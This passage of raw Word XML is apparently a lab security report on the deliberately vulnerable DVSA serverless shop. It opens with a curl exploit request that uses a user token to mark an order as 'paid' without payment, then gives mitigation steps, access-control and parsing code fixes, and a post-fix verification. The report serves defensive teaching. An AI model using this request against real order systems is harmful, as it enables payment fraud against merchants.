        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>curl -s "$API" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29887E40" w14:textId="77777777" w:rsidR="00C3146B" w:rsidRDefault="00C3146B" w:rsidP="00C3146B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>-H "content-type: application/json" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74603716" w14:textId="77777777" w:rsidR="00C3146B" w:rsidRDefault="00C3146B" w:rsidP="00C3146B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>-H "authorization: $TOKEN_B" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2E3F07" w14:textId="77777777" w:rsidR="00C3146B" w:rsidRDefault="00C3146B" w:rsidP="00C3146B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>--data-raw "{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B34C915" w14:textId="77777777" w:rsidR="00C3146B" w:rsidRDefault="00C3146B" w:rsidP="00C3146B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  \"action\":\"update\",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431306CA" w14:textId="77777777" w:rsidR="00C3146B" w:rsidRDefault="00C3146B" w:rsidP="00C3146B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  \"order-id\":\"&lt;ORDER_ID&gt;\",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF85D42" w14:textId="77777777" w:rsidR="00C3146B" w:rsidRDefault="00C3146B" w:rsidP="00C3146B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  \"items\":{\"1\":1},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121E79B5" w14:textId="77777777" w:rsidR="00C3146B" w:rsidRDefault="00C3146B" w:rsidP="00C3146B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  \"data\":{\"status\":\"paid\"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739A05A3" w14:textId="362FC83B" w:rsidR="00C3146B" w:rsidRDefault="00C3146B" w:rsidP="00C3146B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>}" | jq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273BAA8E" w14:textId="77777777" w:rsidR="009577E5" w:rsidRDefault="009577E5" w:rsidP="00C3146B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16284B85" w14:textId="63FA8101" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Evidence and Proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEFCDE5" w14:textId="77777777" w:rsidR="002D4E8F" w:rsidRDefault="002D4E8F" w:rsidP="002D4E8F">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>The exploit was successful because the backend accepted the "update" request and returned "cart updated", indicating that the unauthorized operation was executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751017BA" w14:textId="5214AC82" w:rsidR="002D4E8F" w:rsidRDefault="002D4E8F" w:rsidP="00076272">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>This confirms that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056B1F6D" w14:textId="77777777" w:rsidR="002D4E8F" w:rsidRDefault="002D4E8F" w:rsidP="002D4E8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>A normal user can directly invoke backend functionality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A15EF4" w14:textId="20E1EB8D" w:rsidR="002D4E8F" w:rsidRDefault="002D4E8F" w:rsidP="002D4E8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The system allows modification of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C36467">
        <w:t>order</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C36467">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>state</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C36467">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>without authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D899151" w14:textId="3EC4A5FC" w:rsidR="00BA72A1" w:rsidRDefault="002D4E8F" w:rsidP="002D4E8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Payment workflow was bypassed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BD7068" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="3DDB226E" w14:textId="77777777" w:rsidR="00F36111" w:rsidRDefault="00F36111" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="03FB5B48" w14:textId="77777777" w:rsidR="00F36111" w:rsidRDefault="00F36111" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="36808C12" w14:textId="69F6349B" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:lastRenderedPageBreak/>
        <w:t>Fix Strategy / Probable Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B799CF" w14:textId="47A15FD3" w:rsidR="00F36111" w:rsidRDefault="00F36111" w:rsidP="00FC4B92">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>The vulnerability is mitigated by enforcing strict authorization checks in the backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD5F097" w14:textId="62E95DBA" w:rsidR="00F36111" w:rsidRDefault="00F36111" w:rsidP="00F36111">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Fix includes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137BC3CC" w14:textId="77777777" w:rsidR="00F36111" w:rsidRDefault="00F36111" w:rsidP="00F36111">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Restrict "update" action to authorized users only (e.g., admin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E13352A" w14:textId="77777777" w:rsidR="00F36111" w:rsidRDefault="00F36111" w:rsidP="00F36111">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Validate user permissions before modifying order data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1268CA" w14:textId="14E601B7" w:rsidR="00F36111" w:rsidRDefault="00F36111" w:rsidP="00F36111">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Enforce proper workflow (billing must occur before payment confirmation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A42F031" w14:textId="56DC77B6" w:rsidR="00F36111" w:rsidRDefault="00F36111" w:rsidP="00F36111">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Additionally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35054D2F" w14:textId="77777777" w:rsidR="00F36111" w:rsidRDefault="00F36111" w:rsidP="00F36111">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Replace unsafe deserialization (node-serialize)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276EE58F" w14:textId="77777777" w:rsidR="00F36111" w:rsidRDefault="00F36111" w:rsidP="00F36111">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Normalize data types (boolean handling)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552C5CEC" w14:textId="01BCC8B9" w:rsidR="00BA72A1" w:rsidRDefault="00F36111" w:rsidP="00EA738F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Improve input validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6796CFD0" w14:textId="3F83F2C2" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Code / Config Changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27306589" w14:textId="2C85CCAF" w:rsidR="00BA72A1" w:rsidRDefault="006C67B4" w:rsidP="006C67B4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C67B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Access Control Fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D37EE79" w14:textId="77777777" w:rsidR="006C67B4" w:rsidRDefault="006C67B4" w:rsidP="006C67B4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>case "update":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C4A32C" w14:textId="77777777" w:rsidR="006C67B4" w:rsidRDefault="006C67B4" w:rsidP="006C67B4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43B4BBB5" w14:textId="77777777" w:rsidR="006C67B4" w:rsidRDefault="006C67B4" w:rsidP="006C67B4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if (!isAdmin) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0791D7BD" w14:textId="77777777" w:rsidR="006C67B4" w:rsidRDefault="006C67B4" w:rsidP="006C67B4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return callback(null, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010E1DFE" w14:textId="77777777" w:rsidR="006C67B4" w:rsidRDefault="006C67B4" w:rsidP="006C67B4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            statusCode: 403,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A152D2" w14:textId="77777777" w:rsidR="006C67B4" w:rsidRDefault="006C67B4" w:rsidP="006C67B4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            headers: { "Access-Control-Allow-Origin": "*" },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F308F2" w14:textId="77777777" w:rsidR="006C67B4" w:rsidRDefault="006C67B4" w:rsidP="006C67B4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            body: JSON.stringify({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAB1C45" w14:textId="77777777" w:rsidR="006C67B4" w:rsidRDefault="006C67B4" w:rsidP="006C67B4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                status: "err",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156857E3" w14:textId="77777777" w:rsidR="006C67B4" w:rsidRDefault="006C67B4" w:rsidP="006C67B4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                msg: "Unauthorized: update not allowed"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F006A9E" w14:textId="77777777" w:rsidR="006C67B4" w:rsidRDefault="006C67B4" w:rsidP="006C67B4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E07105B" w14:textId="77777777" w:rsidR="006C67B4" w:rsidRDefault="006C67B4" w:rsidP="006C67B4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="600B4E8B" w14:textId="77777777" w:rsidR="006C67B4" w:rsidRDefault="006C67B4" w:rsidP="006C67B4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD12262" w14:textId="77777777" w:rsidR="006C67B4" w:rsidRDefault="006C67B4" w:rsidP="006C67B4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E20D50D" w14:textId="77777777" w:rsidR="006C67B4" w:rsidRDefault="006C67B4" w:rsidP="006C67B4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    payload = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9A508D" w14:textId="77777777" w:rsidR="006C67B4" w:rsidRDefault="006C67B4" w:rsidP="006C67B4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        user: user,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471122BD" w14:textId="77777777" w:rsidR="006C67B4" w:rsidRDefault="006C67B4" w:rsidP="006C67B4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        orderId: req["order-id"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776E8DB0" w14:textId="77777777" w:rsidR="006C67B4" w:rsidRDefault="006C67B4" w:rsidP="006C67B4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        items: req["items"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673EA1C1" w14:textId="77777777" w:rsidR="006C67B4" w:rsidRDefault="006C67B4" w:rsidP="006C67B4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>};</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="68D05D06" w14:textId="77777777" w:rsidR="006C67B4" w:rsidRDefault="006C67B4" w:rsidP="006C67B4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    functionName = "DVSA-ORDER-UPDATE</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3CCAFCEA" w14:textId="1C8DAF4F" w:rsidR="006C67B4" w:rsidRPr="006C67B4" w:rsidRDefault="006C67B4" w:rsidP="006C67B4">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>break;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4426C8C2" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="6CD2B83D" w14:textId="77777777" w:rsidR="00C44023" w:rsidRDefault="00C44023" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="05C8791F" w14:textId="77777777" w:rsidR="00C44023" w:rsidRDefault="00C44023" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="1031652F" w14:textId="300CD9DD" w:rsidR="00BA72A1" w:rsidRPr="00C44023" w:rsidRDefault="00C44023" w:rsidP="00C44023">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C44023">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Safe Parsing Fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6775217D" w14:textId="77777777" w:rsidR="00C44023" w:rsidRDefault="00C44023" w:rsidP="00C44023">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>const req = JSON.parse(event.body</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6B6AA868" w14:textId="1392B6E4" w:rsidR="00BA72A1" w:rsidRDefault="00C44023" w:rsidP="00C44023">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>const headers = event.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>headers;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4AF55A51" w14:textId="77777777" w:rsidR="00C44023" w:rsidRDefault="00C44023" w:rsidP="00C44023">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E5863A8" w14:textId="21AA37BA" w:rsidR="00C44023" w:rsidRDefault="00C44023" w:rsidP="00C44023">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C44023">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Boolean Handling Fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B8AED5" w14:textId="4AE032D6" w:rsidR="00C44023" w:rsidRDefault="00C44023" w:rsidP="00C44023">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C44023">
        <w:t>isAdmin = (val === true || val === "true"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C44023">
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1C92FFAA" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="58A8A6F8" w14:textId="3340FA1F" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Verification After Fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0CEDC6" w14:textId="2FC2E764" w:rsidR="007B5BAF" w:rsidRDefault="007B5BAF" w:rsidP="00CD61A9">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>After applying the fix, the same exploit request was executed again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040AB421" w14:textId="77777777" w:rsidR="007B5BAF" w:rsidRDefault="007B5BAF" w:rsidP="00CD61A9">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ACF862" w14:textId="77777777" w:rsidR="007B5BAF" w:rsidRDefault="007B5BAF" w:rsidP="00CD61A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>The system rejected the request OR had no effect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5BF346" w14:textId="6BC18963" w:rsidR="00BA72A1" w:rsidRDefault="007B5BAF" w:rsidP="00CD61A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>The order remained unchanged</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22353261" w14:textId="477123F4" w:rsidR="00BA72A1" w:rsidRDefault="00CD61A9" w:rsidP="00CD61A9">
      <w:r>
        <w:t>For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3B5739" w14:textId="6ED588E2" w:rsidR="00CD61A9" w:rsidRDefault="00CD61A9" w:rsidP="00CD61A9">
      <w:r w:rsidRPr="00CD61A9">
        <w:t>"orderStatus": 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3654C5C9" w14:textId="2E465EB6" w:rsidR="00CD61A9" w:rsidRDefault="00CD61A9" w:rsidP="00CD61A9">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>This confirms that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3489B5" w14:textId="77777777" w:rsidR="00CD61A9" w:rsidRDefault="00CD61A9" w:rsidP="00CD61A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Unauthorized updates are no longer possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777756C2" w14:textId="027A3759" w:rsidR="00BA72A1" w:rsidRDefault="00CD61A9" w:rsidP="00E42644">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Access control is properly enforced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B0E760" w14:textId="1CD8C2F4" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Structured Operation and Security Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187C3821" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="2DB8D432" w14:textId="2CFC7F12" w:rsidR="00D84B64" w:rsidRPr="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D84B64">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Structured analysis summary — Table A</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9237" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1848"/>
        <w:gridCol w:w="1845"/>
        <w:gridCol w:w="1848"/>
        <w:gridCol w:w="1848"/>
        <w:gridCol w:w="1848"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D84B64" w14:paraId="25064DEE" w14:textId="77777777" w:rsidTr="00D84B64">
        <w:trPr>
          <w:trHeight w:val="902"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EA0003F" w14:textId="77777777" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00051D50">
            <w:r>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1845" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B3643E7" w14:textId="718552C6" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
            <w:r w:rsidRPr="00D84B64">
              <w:t>Intended Rule(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BD7FF02" w14:textId="55C3DDC6" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
            <w:r w:rsidRPr="00D84B64">
              <w:t>Artifacts Used to Infer Rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BCE5EBA" w14:textId="1DB1B243" w:rsidR="00D84B64" w:rsidRDefault="00D84B64" w:rsidP="00D84B64">
            <w:r w:rsidRPr="00D84B64">
              <w:t>Normal Behavior Evi dence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1848" w:type="dxa"/>
          </w:tcPr>
